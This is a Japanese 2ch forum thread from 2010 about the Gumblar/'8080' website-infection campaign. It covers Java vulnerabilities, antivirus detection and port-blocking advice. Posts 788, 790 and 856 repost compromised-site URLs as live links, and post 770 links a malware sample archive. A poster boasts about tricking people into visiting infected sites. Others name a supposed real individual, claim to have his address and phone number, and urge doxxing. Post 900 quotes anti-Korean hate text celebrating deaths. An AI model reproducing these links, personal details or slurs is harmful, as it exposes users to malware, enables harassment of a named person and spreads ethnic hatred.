M0ElMkYlMkZwYzExLjJjaC5uZXQlMkZ0ZXN0JTJGcmVhZC5jZ2klMkZzZWMlMkYxMjY4MDU5Njg0
JTJGNzU0JmJvbzIwMDhfdGltZT0yMDEwJTJGMDQlMkYxMyUyOCU4OSVDRSUyOSsxMyUzQTQzJTNB
NDMmYm9vMjAwOF9pZD0mYm9vMjAwOF9wb3J0PSZib28yMDA4X3RyaXA9


>>753
77y8KF5vXinvvI/jgqrjgr/jg68=

758 :名無しさん@お腹いっぱい。:2010/04/13(火) 14:47:25
これじゃ、どこのサイトが危険なのか分からん


759 :名無しさん@お腹いっぱい。:2010/04/13(火) 17:31:25
よかった、うちのサイトは晒されてないわ

760 :名無しさん@お腹いっぱい。:2010/04/13(火) 17:44:46
コントロールパネル見てて思ったんだが、
J2SE runtime Environment 5.0 update6と
Java(TM)6 update19が一緒に存在してるんだ
これは更新の仕様がないJ2SEを消すべき?それとも両方とも置いておかないといけないモノ?

761 :名無しさん@お腹いっぱい。:2010/04/13(火) 18:06:25
>>760
古いの消せ

762 :コテハン ◆8080adndqg :2010/04/13(火) 18:16:50
>>757
>串迎撃部隊@2ch掲示板 -- Boo2008 --
>Good bye 9000
>がいしゅつ!!Done ! -> [BBQ]None(^-^)

>名も無きBoo2008さん、ありがとうですm(_ _)m

>\(^o^)/オワタ


763 :名無しさん@お腹いっぱい。:2010/04/13(火) 18:28:23
>>762
IGh0dHA6Ly9qYS53aWtpcGVkaWEub3JnL3dpa2kvJUUzJTgyJUFBJUUzJTgyJUJGJUUzJTgzJUFG

764 :名無しさん@お腹いっぱい。:2010/04/13(火) 19:29:14
もうJava自体をアンインスコしたんだけど
無くて困ることってなにかある?

765 :名無しさん@お腹いっぱい。:2010/04/13(火) 19:30:26
あなたが困らなければ無いし、困ればそれ

766 :コテハン ◆8080adndqg :2010/04/13(火) 19:37:30
>>763
\(^o^)/オタワ

・・・・・・もうやめよう(苦笑)

767 :名無しさん@お腹いっぱい。:2010/04/13(火) 20:15:40
おーはぴーでーい


768 :名無しさん@お腹いっぱい。:2010/04/13(火) 20:35:27
>764
Javaに新たな問題が見つかる、多数のブラウザに影響の恐れ
ttp://www.itmedia.co.jp/enterprise/articles/1004/13/news072.html
Java Deployment Toolkitに見つかった新たな問題
launch()メソッドからJava Web Startユーティリティ(javaws.exe)に任意の引数を渡すことができてしまうという
。攻撃者が悪用した場合、ユーザーが細工されたHTMLを閲覧してしまうことで
リモートから任意のJARファイルを実行されてしまう危険がある。

 Java Deployment Toolkitは、Java SE 6 update 10以降をインストールした際に
同時にインストールされる。ブラウザのプラグインやActive-X コントロールとしても利用されるため
Microsoft Internet ExplorerやFirefox、Google ChromeなどWindowsベースの
多数のブラウザに影響が及ぶ可能性がある。

 米Oracleの対応は未定。IPAとJPCERT コーディネーションセンターは
当面の回避策として、ActiveX コントロールやブラウザのJava Deployment Toolkitを
無効にすることを推奨している。


769 :コテハン ◆8080adndqg :2010/04/13(火) 21:30:07
【陥落サイトのURL悪用厳禁】
www●tu-han4●com/hatumo/
www●daini-survey●com/
versamold●com/

難読化はムダっぽい...

770 :名無しさん@お腹いっぱい。:2010/04/13(火) 23:56:48
Gumblarまとめ
http://labs-uploader.sabaitiba.com/virus/download/1271170314.zip
infected

771 :名無しさん@お腹いっぱい。:2010/04/14(水) 00:00:31
Javaに未修正の脆弱性、Webページを閲覧するだけで攻撃を受けるおそれ
IE6/7/8や「Firefox」「Google Chrome」などWebブラウザー全般が対象
http://www.forest.impress.co.jp/docs/news/20100413_360951.html

772 :名無しさん@お腹いっぱい。:2010/04/14(水) 08:20:05
Adobe Readerアップデートきたな

773 :名無しさん@お腹いっぱい。:2010/04/14(水) 08:51:00
>>772
またなんかありそうだから様子見。
てか、もう Foxit に乗り換えたし。


774 :名無しさん@お腹いっぱい。:2010/04/14(水) 12:37:10
コンパネ見たがJavaは最近更新したRuntimeしかなかった
上で述べられてるツールキットは最近の奴だとruntime内蔵なのかな?
そうならどうやって無効化するのか……
ActiveXはインターネットオプションで無効化できるんだが

775 :名無しさん@お腹いっぱい。:2010/04/14(水) 13:08:35
>>774
対象がIEだけなら
ttp://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2010.04/msg00133.html
を参考にKill-Bitを追加すればいい。

複数のブラウザを入れていて、個別ではなく一括で対策したいならjavaws.exeのアクセス権を
読み取り実行拒否に変更してやればいい。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100412_JAVA

776 :名無しさん@お腹いっぱい。:2010/04/14(水) 14:20:48
【陥落サイトのURL悪用厳禁】 ←まねしてみた
www●sot●com●al

VirusTotalでの検出結果は5/40(12.5%)
Avast頑張るなぁ

777 :名無しさん@お腹いっぱい。:2010/04/14(水) 14:29:12
avastは今は知らないが初期の頃はスクリプトの段階で処理しないと防御できなかったからな
スクリプトに対応しなくても防御はできるが
こういう風に特に初心者にアピールにはなるから一生懸命なのだろう

778 :名無しさん@お腹いっぱい。:2010/04/14(水) 14:51:17
サブPCでavastを使ってるけど>>770の検体の全てに反応した。
メインPCでは某ベンダの有料版を使っているが>>770の検体の検出はまちまちだった。
ただ>>754のサイトでは全てに反応した。
avastはソース段階(スクリプト自体)で検出しているが、
某ベンダは実行段階で検出しているようだ。

779 :名無しさん@お腹いっぱい。:2010/04/14(水) 15:36:22
そうか。よかったな。

780 :名無しさん@お腹いっぱい。:2010/04/14(水) 16:31:50
そもそもソースの段階で何を検出してんだ

781 :名無しさん@お腹いっぱい。:2010/04/14(水) 16:38:35
>>770
AVG Freeが9個しか反応しなかった・・・おぉコワイコワイ

782 :名無しさん@お腹いっぱい。:2010/04/14(水) 17:41:13
avast5だけど、>>770で3つスルーされた・・・
なるほど、オレはもう掛かってるのか!

783 :名無しさん@お腹いっぱい。:2010/04/14(水) 17:51:14
>>782
スルーした3つをhttp://www.virustotal.com/jp/で調べてみれば?
無害かも

784 :名無しさん@お腹いっぱい。:2010/04/14(水) 17:55:21
gumblerにも無害有害があるのか……
つか、最近の亜種だとcmdとregdit動くみたいだし、どういう症状が出るか解らんから
感染してるかどうかすらオンラインスキャン以外じゃわからんよな

785 :名無しさん@お腹いっぱい。:2010/04/14(水) 18:00:48
>>2の対策してれば、まず感染しないよ

786 :名無しさん@お腹いっぱい。:2010/04/14(水) 18:15:49
>>783
3つとも解析済みで、検出したのはなかったそうだ
再解析してみたら1つだけ出てきた
Gumblar_js.txt
Sophos 4.52.0 2010.04.14 Troj/JSRedir-BD

787 :コテハン ◆8080adndqg :2010/04/14(水) 18:25:50
【陥落サイトのURL悪用厳禁】
www●nittoka●com/ ←そーすの途中にコードが・・・
discussanctuary●com/からコードごと引っ越したのかな?

www●1a●ad-jeaayf●com/ae/
s6●artemisweb●jp/djtsushin/naruto/part1/index●html ←改竄されてるってばよw※jword注意


788 :名無しさん@お腹いっぱい。:2010/04/14(水) 18:26:19
http://www.tu-han4.com/hatumo/
http://www.daini-survey.com/
http://versamold.com/
http://www.sot.com.al

789 :名無しさん@お腹いっぱい。:2010/04/14(水) 19:00:08
avast!は文字列自体に反応してるみたいだな
http://i39.tinypic.com/2z8ybts.png

790 :名無しさん@お腹いっぱい。:2010/04/14(水) 19:06:58
http://www.nittoka.com
http://www.1a.ad-jeaayf.com/ae/
http://s6.artemisweb.jp/djtsushin/naruto/part1/index.html

791 :名無しさん@お腹いっぱい。:2010/04/14(水) 19:35:42
788
1:きゅい〜ん
2:きゅい〜ん
3:403
4:きゅい〜ん
790
1:きゅい〜ん
2:きゅい〜ん
3:きゅい〜ん

avast! 大勝利w

792 :名無しさん@お腹いっぱい。:2010/04/14(水) 19:43:52
アバストは警告を発した!しかし、感染してしまった

793 :名無しさん@お腹いっぱい。:2010/04/14(水) 19:45:10
>>792
なんやねん、それ・・・

794 :名無しさん@お腹いっぱい。:2010/04/14(水) 22:45:07
KATINOが効かないと全滅するパーティーですか

795 :名無しさん@お腹いっぱい。:2010/04/14(水) 23:04:19
>>2
(4) JRE(Java Runtime Environment)を最新版に更新する

これはAdobe Readerなんかと同じでWindowsをインストールしただけでは
JREはインストールされないよね?
JREをインストールしていなければ特に気にする必要はないんだよね?
PC初心者でちょっとよくわからないので教えてくれると助かります

796 :名無しさん@お腹いっぱい。:2010/04/14(水) 23:11:14
初心者であればメーカー製PCを使用している可能性が高い
メーカー製PCにはAdobeReaderもJREもプリインストールされていることがほとんど

797 :名無しさん@お腹いっぱい。:2010/04/15(木) 00:38:31
コントロールパネルにJavaのアイコンがあればインストールされてる
ちなみにそのアイコンをダブルクリックするとバージョン確認やアップデートもできる

798 :名無しさん@お腹いっぱい。:2010/04/15(木) 01:03:48
>>795
WindowsをインストールしただけではJAVAは入らないよ
上の人が言うようにメーカー製PCを買った場合は入ってるかもしれない
でもWindowsのCDを使ってOSをインストールしただけではJAVAは入らない

799 :名無しさん@お腹いっぱい。:2010/04/15(木) 01:09:31
JREはアンインスコor入れないで全然問題ないと思うけどね

800 :名無しさん@お腹いっぱい。:2010/04/15(木) 01:31:05
君にとってはそうなんだろうが、それを言い出すと最後には「Windowsじゃなくても全然問題
ないと思うけどね」みたいな不毛な話になるから自重しろ。

801 :名無しさん@お腹いっぱい。:2010/04/15(木) 04:54:15
>>689-740
「不正改ざんに関するお詫び」
Last-Modified: Wed, 14 Apr 2010 07:03:06 GMT : www.collco.jp/index.html

802 :名無しさん@お腹いっぱい。:2010/04/15(木) 10:39:43
Adobe Reader 修正キタコレ
http://www.forest.impress.co.jp/docs/news/20100414_361134.html

803 :名無しさん@お腹いっぱい。:2010/04/15(木) 13:52:15
>>801
思うんだが、「不正改ざんされた」ってのは責任逃れだろ。
むしろ、ここのサイト覗いた奴のPC「不正改ざんした」のがこの会社だろうに。

>※本件による、お客様にお預かりしております個人情報の流出はございません。
お前のサイト覗いたせいでパスとか流出する話しないで、どうすんだよ

804 :名無しさん@お腹いっぱい。:2010/04/15(木) 14:00:32
0-day対策版?
ttp://java.sun.com/javase/6/webnotes/6u20.html

805 :名無しさん@お腹いっぱい。:2010/04/15(木) 15:13:56
スレに出ているサイトにクリックしても2割くらいしか反応しない。
ちなみにカスペルスキー2010
これはザルなのか?
設定でオフになってるのかと思いきやそうでもないし

806 :名無しさん@お腹いっぱい。:2010/04/15(木) 15:59:12
Java Deployment Toolkit 6.0.200.2
Java(TM) Platform SE 6 U20 6.0.200.2

807 :名無しさん@お腹いっぱい。:2010/04/15(木) 17:24:18
>>805
とりあえず>>770の検体送れ。
話はそれからだm9(^Д^)

808 :名無しさん@お腹いっぱい。:2010/04/15(木) 17:30:49
>>805
検体提出汁


809 :名無しさん@お腹いっぱい。:2010/04/15(木) 18:38:56
>>805
反応しないとこは修正済みもあるんじゃね

810 :名無しさん@お腹いっぱい。:2010/04/15(木) 21:33:22
*:8080/* をブロックでおkだよね?
*の位置が分からん

811 :名無しさん@お腹いっぱい。:2010/04/15(木) 21:43:06
>804
Java Deployment Toolkit の脆弱性を悪用したゼロディ攻撃を観測
https://www-950.ibm.com/blogs/tokyo-soc/entry/javaws-201004?lang=ja
2010年4月15日、Oracle より Java SE 6 Update 20 がリリースされました[5]。
東京SOCでは、上記バージョンの JRE をインストールすることで、本脆弱性への攻撃を
防げることを確認しております。



812 :名無しさん@お腹いっぱい。:2010/04/15(木) 21:43:39
他の普通のサイトも巻き添えにしていいなら
>>810
巻き添えにしたくないなら
*.ru:8080/*

813 :名無しさん@お腹いっぱい。:2010/04/15(木) 21:50:15
>>812
最近は.atと.infoも侵食されてるからそれじゃダメ

814 :名無しさん@お腹いっぱい。:2010/04/15(木) 22:53:40
うむ、8080ポートの先にコンテンツを置くページは巻き添えにされても仕方ないな。

815 :名無しさん@お腹いっぱい。:2010/04/15(木) 23:22:42
特定のURLブロックしてる人ってどういうソフト使ってますか?
PeerBlockとかあるみたいだけどこれ使えばいいのかな

816 :名無しさん@お腹いっぱい。:2010/04/16(金) 00:01:31
>>810
ブラウザのJAVAScript切っとけ

817 :名無しさん@お腹いっぱい。:2010/04/16(金) 00:25:29
>>815
意味ない

818 :名無しさん@お腹いっぱい。:2010/04/16(金) 01:00:32
>>810
例えば敵方が8090に変った時には8080ブロックは無意味

819 :名無しさん@お腹いっぱい。:2010/04/16(金) 03:50:08
あたりめえだろ
先のこと考えたら無意味なことばかりだ
現状の防御としては意味があるのだからそれで良いに決まってる

820 :名無しさん@お腹いっぱい。:2010/04/16(金) 04:39:03
【陥落サイトのURL悪用厳禁】
www1●kamakuranet●ne●jp/artinfo/ メル凸済み



心の和む小ネタをひとつ

http://www.aguse.jp/?m=w&url=helphomecare●at%3A8080&x=15&y=13

http://www.aguse.jp/?m=w&url=helphomecare●at&x=52&y=14

http://a001.aguse.jp/images/img/6d53e388eed6c7f0f5b3404a9e7a1e65f4e47f3c/ea280effbf7dbaa378533a69bd2dc1a216ea0eca_00_x.jpg

Fuck off!

821 :名無しさん@お腹いっぱい。:2010/04/16(金) 05:27:48
>>817
んじゃどういうソフト使ってるんですかね
avast!5にはURLブロック付いてるようですが

822 :名無しさん@お腹いっぱい。:2010/04/16(金) 05:34:33
ポート8080ブロックするだけならいろんなファイアウオールで可能だよ
大概のルーター内蔵のでも可能じゃないか

823 :名無しさん@お腹いっぱい。:2010/04/16(金) 07:50:46
Proxomitron なら正規表現風味の細かい指定が出来る。
セキュ板覗くような人間ならデフォで入れてるソフトだと思ってたんだが違うのか。

824 :名無しさん@お腹いっぱい。:2010/04/16(金) 08:25:31
違うだろうな

825 :名無しさん@お腹いっぱい。:2010/04/16(金) 08:53:13
>>823
Proxomitron はよく知らないが
難読化されてるスクリプトも簡単にフィルタリングできるのか?

826 :名無しさん@お腹いっぱい。:2010/04/16(金) 11:02:00
>>823
入れてるけど使ってない

827 :名無しさん@お腹いっぱい。:2010/04/16(金) 11:08:34
>>823
無料HPスペースの広告がウザかった時代に使ってたけど、今は使ってない。

>>825
自分でフィルター書かなきゃダメ、もしくは有志の人待ち

828 :名無しさん@お腹いっぱい。:2010/04/16(金) 11:28:40
>>825
パターンが変わればその都度になるが、現行では一応対応できているけど。
最近は変化が無いからつまらん。

829 :名無しさん@お腹いっぱい。:2010/04/16(金) 11:32:34
どのみちいらねえよ

830 :名無しさん@お腹いっぱい。:2010/04/16(金) 11:40:08
Proxomitronの脆弱性放置中


831 :名無しさん@お腹いっぱい。:2010/04/16(金) 17:24:39
>>820
www1●kamakuranet●ne●jp/artinfo/
メル凸先からttp://www.painters-club.com/homepage-artist.html
に連絡は行ったらしいが、なぜか別のページを閉鎖したらしい

832 :名無しさん@お腹いっぱい。:2010/04/16(金) 19:41:25
>>822-823
ありがとうございます。
とりあえず手持ちのFWでリモートポート8080番をシャットアウトすればいいんですかね?

833 :名無しさん@お腹いっぱい。:2010/04/16(金) 20:01:44
まず>>2をやれよと

834 :名無しさん@お腹いっぱい。:2010/04/16(金) 20:16:36
Javaは早急にu20にしないと危険だべな
Deployment Toolkitの脆弱性が8080インジェクションで使われ始めてるらしいから

835 :名無しさん@お腹いっぱい。:2010/04/16(金) 20:31:40
なんか、ここの被害報告のヒロまり方見てると、
ダウソ板のイカタコなんて、子供の遊びに見えてくるな

836 :名無しさん@お腹いっぱい。:2010/04/16(金) 20:37:49
12月下旬から騒ぎ出した気がするけど
4月になっても収まらないね。

837 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:10:12
>>835
実際子供の遊びだろ

838 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:24:29
>>2の対策しておけばウイルス対策ソフトはいらない?

839 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:27:47
いります

840 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:34:03
java19入ってる状態で20入れたら19がコントロールパネルから消えた
これは上書きされたって事でいいのかな
以前の17→19の時は上書きなんてしなかったから「ひょっとして19のプログラム残ってるんじゃないか」って不安

>>2の対策してれば、あとはActiveXやJavaを自動実行したりしないようにすればおkかな

841 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:35:39
20でだいじょうぶなのかな

842 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:42:01
2ch「三脚」検索でHTML/spoofing Genが・・・どうゆうこと?

843 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:43:22
>>840
心配なら入れなおせばおk

844 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:54:15
>>840
xpでjava19から20に上書きしたらfireroxのプラグインに19と20の
Deployment ToolkitがあったのでJava20をアンインストール後に
再度20をインストールした。
そしたら19の姿が消えたので心配なら一度アンインストールをした
方がいいと思う。


845 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:56:27
>>843
それもそうだな……アンインスコして入れ直してみる

そういえば、ここの文字検索でgoogleがいくつかあるんだが、
ひょっとしてgoogle自体もう全て完全に感染してるのか?
PCが重くなってる様子もメモリ異常に食われてるって事もないんだが……

846 :名無しさん@お腹いっぱい。:2010/04/16(金) 21:57:42
なんでDeployment Toolkitとか余計なもん入れた

847 :名無しさん@お腹いっぱい。:2010/04/16(金) 22:12:22
過去のJavaデータとかはJavaRaで消してるなあ

848 :名無しさん@お腹いっぱい。:2010/04/16(金) 22:38:56
>>831
再度メール出します、ご報告感謝

849 :名無しさん@お腹いっぱい。:2010/04/16(金) 23:01:59
>>845
どれのことを言ってるの?
URLを理解できていないってことならどっかで勉強してきてください

そもそもgoogle自体が感染してたらここで騒がれるとかそういうレベルじゃ収まらんだろ

850 :名無しさん@お腹いっぱい。:2010/04/16(金) 23:08:33
>>849
ごめん、URLと検索ワード読み直して大体把握した
感染サイトを探した結果だったのね……

851 :名無しさん@お腹いっぱい。:2010/04/16(金) 23:45:53
avast、GDataのみヒット

http://www.virustotal.com/jp/analisis/94ff0b47a595324877d535d963346ccfe8e7c70140327fd95498f14c88279c5a-1271428269

852 :名無しさん@お腹いっぱい。:2010/04/17(土) 00:26:07
>>851
8080じゃないはず(8080はJS:Illredir)
GDataはavastエンジン使ってるから実質avastだけ検知

853 :名無しさん@お腹いっぱい。:2010/04/17(土) 00:39:40
スレ違いか、すまない

854 :名無しさん@お腹いっぱい。:2010/04/17(土) 01:08:37
仕込まれる位置とかがちょっと違うようだね
海外では3月下旬くらいから出てるのかな

855 :名無しさん@お腹いっぱい。:2010/04/17(土) 01:42:02
>>854
定義自体は2009/02/18に追加

856 :名無しさん@お腹いっぱい。:2010/04/17(土) 02:30:10
http://www.shinsei-fukushi.net/
http://www.plci.net/egf/

857 :(VДV) ◆yUyb3Tqn92 :2010/04/17(土) 07:10:05
>>853
すまないではすまないのだ!

(VДV)死ねっ!さぁ死ぬのだ低脳よ

858 :(VДV) ◆yUyb3Tqn92 :2010/04/17(土) 07:12:05
さて朝の挨拶も済んだことだし
ガンブラをガンプラスレにでも貼り貼りしてきますかのう( VдV)

( ´,дゝ`)フォッフォフォフォーwww

859 :名無しさん@お腹いっぱい。:2010/04/17(土) 07:42:20
>>858
ようお前にこないだウイルス踏まされたもんじゃボケ!
お前の本名、斎藤智成だろ?住所もググったらあったから請求書送るから待っとけや!w

860 :名無しさん@お腹いっぱい。:2010/04/17(土) 07:50:19
住所がわかるなら直接行けば?
その方が話が早いだろ

861 :名無しさん@お腹いっぱい。:2010/04/17(土) 08:00:27
なんか変な人いるけどなにこいつ

862 :(VдV) ◆yUyb3Tqn92 :2010/04/17(土) 08:39:58
('д')うん、確かに変な人いるね
俺様にウィルス踏まされる時点で自己管理が悪いわけで、つまり踏む奴が悪いわけで
これはもう暗黙の了解ならぬ暗黙の常識なわけで(>w<)変な人だなぁプクススススwwwwwwwwwwwwww

(VдV)しかも請求書ってなにいってるんだ?
もし俺様が踏ませたウィルスの影響で金銭的な損害を受けたのだとしたら
それは・・・



(VДV)ざまあみろだぜ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

863 :(VдV) ◆yUyb3Tqn92 :2010/04/17(土) 08:42:01
それより俺様、昨日うる星やつらの再放送見逃したから
youtubeでその回見なきゃなんないんだ。
やっぱ80年代の神アニメはうる星やつらだよね。

(*VдV*)デヘヘヘヘヘヘヘベヘヘケヘヘヘヘヘヘヘヘヘヘケewwwwwwwwwwwwwwp

864 :名無しさん@お腹いっぱい。:2010/04/17(土) 09:12:22
キチガイってどうしてキチガイなんだろう

865 :名無しさん@お腹いっぱい。:2010/04/17(土) 09:18:04
そりゃーおまえキチガイだからだろ

866 :名無しさん@お腹いっぱい。:2010/04/17(土) 09:56:21
既出かもだけどこの痕跡は何ですか?

/?N=A
/?M=D
/?S=D
/?D=D
/?N=A

867 :866:2010/04/17(土) 09:57:32
補足、ログの痕跡です。


868 :名無しさん@お腹いっぱい。:2010/04/17(土) 10:05:27
何回も言われてるけど一回感染するとルートキットとかで雲隠れしやがるようだから検出できるか怪しいし
ウイルス感染したPCでスキャンしても絶対安全と保障できないぞ
心当たりあるんなら素直にクリーンインスコしたほうが良いよ
>>2完璧に実行してブラウザ常時仮想化とかしてて「俺がウイルス感染なんかするわけねーだろばーか!」なら自分を信じていいだろうが

869 :名無しさん@お腹いっぱい。:2010/04/17(土) 11:05:56
>>868
言ってる事は解らなくもないがこのスレ全否定してるよな、4行目でスレ住人の卑下までやってるし
クリーンインスコなんてみんながみんなホイホイできるわけでもないだろうに

870 :名無しさん@お腹いっぱい。:2010/04/17(土) 11:38:09
>>862
【間接正犯】
http://ja.wikipedia.org/wiki/%E9%96%93%E6%8E%A5%E6%AD%A3%E7%8A%AF
8080作者のコードを悪用して何等かの被害が発生した時点で成立。


871 :名無しさん@お腹いっぱい。:2010/04/17(土) 12:46:53
>>870
これぞ本当のざまあ ->862

872 :名無しさん@お腹いっぱい。:2010/04/17(土) 13:23:21
まあやる気があれば民事でも請求できるでしょ

873 :名無しさん@お腹いっぱい。:2010/04/17(土) 13:24:21
>>866
アクセスログなら何か試そうとしたんじゃね

874 :866:2010/04/17(土) 13:58:06
>>873

ユーザーディレクトリでのアクセスで
このコマンド?じゃ何も出来ないと思うけど、何かに感染したPCからの痕跡なのか...
ただ、面白いのは、IP調べると日本のM$専用線からのアクセスで
こっそり調べると鯖では無く、クライアントPCっぽい。

875 :名無しさん@お腹いっぱい。:2010/04/17(土) 14:41:03
>>870
>間接正犯とは、他人の行為を利用して自己の犯罪を実現する正犯のことである。
>共犯ではないというのが通説である。
<中略>
>正犯とは、犯罪実現の現実的危険性を有する行為を自ら行う者をいうが、
>「自ら」は規範的理解が可能(緩やかに解することが可能)とする。
>そのうえで、他人を道具として利用する場合は、規範的には「自らの手で」行ったといえ、
>利用者の行為には正犯としての実行行為性が認められるとされる。

8080作者と同じ罪になるって事で・・・
顔文字(糞コテ)オワタwwwwwwww

876 :名無しさん@お腹いっぱい。:2010/04/17(土) 14:46:45
誰かVIPに燃料投下してこいよ。
奴らの調査力なら顔文字野郎の個人情報なんてすぐに割れるだろ。

877 :名無しさん@お腹いっぱい。:2010/04/17(土) 15:01:17
よし、任せたぞ

878 :名無しさん@お腹いっぱい。:2010/04/17(土) 15:13:53
そして「誰かがやるだろ」とみんな思ってるので
誰も投下しないのであった

879 :名無しさん@お腹いっぱい。:2010/04/17(土) 15:16:42
だって板別規制されてるし

880 :名無しさん@お腹いっぱい。:2010/04/17(土) 18:24:50
糞コテのブログから
【ウィルス入りURLを踏ませることは犯罪か?】
ttp://ruhuraro.blog57.fc2.com/blog-entry-161.html
※見る時はhttp://gw.aguse.jp/経由を推奨
ウイルス入りURLを踏ませる事に対しての直接的な罪は問えないけど
感染後のPCで発生する被害(情報流出が起きる場合)については罪を問えるのです。
※個人情報ぁぅぁぅとか・・・

つまり、8080系の作者のコードが埋め込まれた陥落サイトを
ウイルスに感染する可能性があると知っていて
「その危険性を知らせずに貼った」場合
誰かが踏んで被害が発生した時点で>>870が成立=刑事罰を問えるという事。

糞コテのブログには「踏ませるのが趣味」と書いてあるので
酌量の余地は全くありません()笑


881 :U.F.O ◆U.F.OnbYNA :2010/04/17(土) 18:32:17
なんだよあの糞コテおでん厨じゃなかったのかよ・・・
早く規制されてほしいな。

というか規制からやっと復活したがその間にこんなにガンブラーでてたんだな・・・
              気 を つ け な け れ ば

>>880
つまりこの糞コテを訴える事も出来るわけか。

顔文字ざまぁwwwwwm9(^Д^)プギャーwwwww

882 :名無しさん@お腹いっぱい。:2010/04/17(土) 19:32:16
犯人に告ぐ。今夜は震えて眠れ(キリッ

883 :名無しさん@お腹いっぱい。:2010/04/17(土) 19:57:13
>>862
aHR0cDovL3d3dy5nb29nbGUuY28uanAvc2VhcmNoP2hsPWphJnE9JUU5JTgwJTlEJUUzJ
TgxJUEzJUUzJTgxJUE2JUUzJTgyJTg4JUUzJTgxJTk3KyVFOSVBMSU5NCVFNiU5NiU4Ny
VFNSVBRCU5NyZidG5HPSVFNiVBNCU5QyVFNyVCNCVBMiZscj0=
死語とか言うなよwww

884 :名無しさん@お腹いっぱい。:2010/04/17(土) 20:02:39
5pep44GP5q2744Gta3Nn

885 :名無しさん@お腹いっぱい。:2010/04/17(土) 22:53:06
>>862
通報した

886 :名無しさん@お腹いっぱい。:2010/04/17(土) 23:47:40
顔文字息してるー?w

887 :名無しさん@お腹いっぱい。:2010/04/17(土) 23:56:16
こんなん出てきたんだがww
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/36137/1192213469/l50

888 :名無しさん@お腹いっぱい。:2010/04/18(日) 00:51:43
逮捕者が出ると聞いて

889 :名無しさん@お腹いっぱい。:2010/04/18(日) 01:16:54
また無職か

890 :名無しさん@お腹いっぱい。:2010/04/18(日) 02:56:32
                                  `ヽ、
                                        \
                                         \
       ,,ヅ彡ニミ;;,,              ヅ彡ニミ;;,,          l
      ィ<"  , ‐ 、 ゙ミ、          ィ<"  , ‐ 、 ゙ミ、         ゙i
      ミミ、, ゝ_゚_,ノ,, イ           :ミミ、, ゝ_゚_,ノ,, イ           ゙i
       ゙'ヾ三≡彡'"            ゙'ヾ三≡彡'             i! 
                /        ヽ               ,. -- 、  i!      >>862 しねよ
              /            \           /    __,>─ 、
             /       ',/       ',          /          ヽ
             !          l        l         {           |__
              、        ,' 、        ,'          }  \       ,丿 ヽ
              ヽ . _ .. '  ヽ . _ .. '         /   、 `┬----‐1    }
                                    /   `¬|      l   ノヽ
                                   /    、 !_/l    l    /  }
                                   {       \     l   /  ,'
                                   \      ´`ヽ.__,ノ  /   ノ
                                     \     ヽ、\ __,ノ /
                                       ̄ ヽ、_  〉 ,!、__/


891 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 03:07:44
>>875-890
VдV)ん?
ずいぶんと必死に自演連投をしているようだな
そんなに連続で書き込んでたらいくらIDでなくてもバレバレだぜ
そんなことにも気づけないほど悔しかったのだな( ´,дゝ`)からかった甲斐があるぜ

でも残念ながらその程度の煽りでは不合格
というより残念賞というべきか。
なぜなら5年前からウィルス踏ませ続けてぴんぴんしているのだからな
この事実を覆すことはできないよ(>w<)本当に残念だったな

どぉだ?またムカムカしてきたか?(笑)
(VДV)そうか!じゃあ死ねっ!!!!!!!!(爆)

892 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 03:08:58
(*VдV*)

893 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 03:13:01
(*VдV*)あーきっと今頃・・・
俺様にウィルス踏まされた奴は
俺様がこうやってますます調子に乗り乗り♪してることにムカつきながら俺のこと見てるんだろなw

これだからやめられないお(>w<)快っ感!!!!

894 :名無しさん@お腹いっぱい。:2010/04/18(日) 03:28:23
80年代の神アニメは映画版のSF新世紀レンズマン
「愛するものを守れ」
ブルーレイで出してほしいな…

895 :名無しさん@お腹いっぱい。:2010/04/18(日) 03:29:55
顔文字一人が来ただけでお前ら釣られすぎ

(VдV) ◆yUyb3Tqn92 =斎藤智成
http://www.unkar.org/read/jfk.2ch.net/mmo/1263347649

更にこの名前でぐぐると携帯番号ヒットした


896 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 05:52:41
一仕事してきたので一部紹介
http://yutori7.2ch.net/test/read.cgi/news4vip/1271515115/


(VДV)頭の悪いVIPのツイッタスレ住人大パニック!ブワハハハハハハハハ!!!!!wWwwWWWwwwW

897 :名無しさん@お腹いっぱい。:2010/04/18(日) 05:58:34
まだやってんのか斉藤w

898 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 06:07:26
斉藤ってだあれ?
斎藤ならまだしも斉藤とは?(笑)

(VдV)これってまたまた俺様が一本とっちゃった感じ?
つーわけで漢字読めない低脳は死ね!と止めを刺しておこう(VдV)vチェキラ

899 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 06:09:58
(VдV)!
ウィルス踏ませて笑いながらポテチを食うっ!

とかキラっぽくポテチ食ってるなう!ヽ(VдV)ノなうなうなのらーい

900 :名無しさん@お腹いっぱい。:2010/04/18(日) 06:43:35
韓国、F5戦闘機墜落←ざまーみろ!801ども!

1 :斎藤智成 ◆LIuJMgzRRY :2010/03 /03(水) 17:55:35.83 ID:LlEpEw2v0

おい韓国人みてるか!!!???

F-5戦闘機墜落おめでとう!!!よかったね!!!!!おめでとう祭りだわっしょい!

日本にはニートや陰陽師がいるんだぜ

俺達ニートや陰陽師が韓国人が2人死ぬように術式を組んだんだよ

そのためにはなにか関連したもの、繋がりあるものを狙わなければならなかった

だからF-5戦闘機を狙ったのさ!!!!

ざまーみろ!801野郎ども!死ね!せいぜい801プレイでもしてろよキムチ!

文句があるならニートの代表、斎藤智成様のブログを落としてみやがれ!!!
ttp://www.google.co.jp/search?num=100&hl=ja&safe=off&rlz=1B3DVFA_ja___JP330&q=%E9%9F%93%E5%9B%BD%E3%80%80%E6%96%8E%E8%97%A4%E6%99%BA%E6%88%90&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=

901 :名無しさん@お腹いっぱい。:2010/04/18(日) 06:49:33
